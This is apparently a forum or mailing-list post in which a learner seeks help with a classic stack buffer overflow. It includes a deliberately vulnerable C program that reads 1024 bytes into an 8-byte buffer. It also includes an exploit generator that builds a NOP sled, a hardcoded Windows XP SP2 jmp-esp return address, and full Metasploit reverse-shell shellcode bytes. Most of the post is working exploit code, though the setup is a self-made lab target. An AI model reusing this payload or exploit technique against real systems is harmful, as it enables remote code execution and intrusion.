problem to exploit a stack overflow

[migalo digalo <l.epsilon () gmail com>]

hi all,

first post  :-D

ok,ok i am trying to exploit an example of stack overflow vunerable prog:

[code]#include <stdlib.h>
#include <stdio.h>
int bof()
{
char buffer[8];
FILE *badfile=NULL;

badfile=fopen( "badfile", "r" );
if(badfile)
printf("[+]file open\n");

fread( buffer, sizeof( char ), 1024, badfile );//danger

return 1;
}
int main(int argc, char **argv)
{
bof();

printf("[-] nop nop!\n");
return 1;
}[/code]

so if i am right to exploit this we have the folwing stack
:<NOPS><EBP><EIP><ESP>

EBP==buffer[8]
EIP==buffer[12]
ESP==buffer[16]

so i code this:

[code]
#include<stdio.h>
#include<string.h>
#include<windows.h>
#include <process.h>
#define RET_ADDRESS 0x7C951EED // The new return address for WinXP sp2
french ==jump esp

/* win32_reverse -  EXITFUNC=seh LHOST=127.0.0.1 LPORT=4321 Size=312
Encoder=PexFnstenvSub http://metasploit.com */
unsigned char shellcode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x12"
"\xd4\x56\x85\x83\xeb\xfc\xe2\xf4\xee\xbe\xbd\xc8\xfa\x2d\xa9\x7a"
"\xed\xb4\xdd\xe9\x36\xf0\xdd\xc0\x2e\x5f\x2a\x80\x6a\xd5\xb9\x0e"
"\x5d\xcc\xdd\xda\x32\xd5\xbd\xcc\x99\xe0\xdd\x84\xfc\xe5\x96\x1c"
"\xbe\x50\x96\xf1\x15\x15\x9c\x88\x13\x16\xbd\x71\x29\x80\x72\xad"
"\x67\x31\xdd\xda\x36\xd5\xbd\xe3\x99\xd8\x1d\x0e\x4d\xc8\x57\x6e"
"\x11\xf8\xdd\x0c\x7e\xf0\x4a\xe4\xd1\xe5\x8d\xe1\x99\x97\x66\x0e"
"\x52\xd8\xdd\xf5\x0e\x79\xdd\xc5\x1a\x8a\x3e\x0b\x5c\xda\xba\xd5"
"\xed\x02\x30\xd6\x74\xbc\x65\xb7\x7a\xa3\x25\xb7\x4d\x80\xa9\x55"
"\x7a\x1f\xbb\x79\x29\x84\xa9\x53\x4d\x5d\xb3\xe3\x93\x39\x5e\x87"
"\x47\xbe\x54\x7a\xc2\xbc\x8f\x8c\xe7\x79\x01\x7a\xc4\x87\x05\xd6"
"\x41\x87\x15\xd6\x51\x87\xa9\x55\x74\xbc\x45\x0d\x74\x87\xdf\x64"
"\x87\xbc\xf2\x9f\x62\x13\x01\x7a\xc4\xbe\x46\xd4\x47\x2b\x86\xed"
"\xb6\x79\x78\x6c\x45\x2b\x80\xd6\x47\x2b\x86\xed\xf7\x9d\xd0\xcc"
"\x45\x2b\x80\xd5\x46\x80\x03\x7a\xc2\x47\x3e\x62\x6b\x12\x2f\xd2"
"\xed\x02\x03\x7a\xc2\xb2\x3c\xe1\x74\xbc\x35\xe8\x9b\x31\x3c\xd5"
"\x4b\xfd\x9a\x0c\xf5\xbe\x12\x0c\xf0\xe5\x96\x76\xb8\x2a\x14\xa8"
"\xec\x96\x7a\x16\x9f\xae\x6e\x2e\xb9\x7f\x3e\xf7\xec\x67\x40\x7a"
"\x67\x90\xa9\x53\x49\x83\x04\xd4\x43\x85\x3c\x84\x43\x85\x03\xd4"
"\xed\x04\x3e\x28\xcb\xd1\x98\xd6\xed\x02\x3c\x7a\xed\xe3\xa9\x55"
"\x99\x83\xaa\x06\xd6\xb0\xa9\x53\x40\x2b\x86\xed\xe2\x5e\x52\xda"
"\x41\x2b\x80\x7a\xc2\xd4\x56\x85";

int main(int argc,char *argv[]){

unsigned long addr;
char buf[1024];
FILE * badfile;

memset(buf,0x90,1024);

*(unsigned long *)&buf[12] = RET_ADDRESS;//EIP=Return Address
memcpy(&buf[16],shellcode,sizeof(shellcode)-1);

badfile = fopen("badfile","wb");
fwrite(buf,1020,1,badfile);
fclose(badfile);
return 0x0;
}[/code]

but it doesn't work,
:-(  :no ,any help i am stuck with this for 8 hrs.

in fact it work till the execution of the shellcode ,precisely the
decode stage,so we get
[+] eip <= RET_ADDRESS
[+] jump esp
[+] begin the shellcode execution
[-] acces violation,in the decode stage:-x

and what is worse is that i get the same prob with all the shellcode i
used (all from metasploit),i am certain the are samething i missed
,cuz i have already used those shellcodes and they work perfect.
any help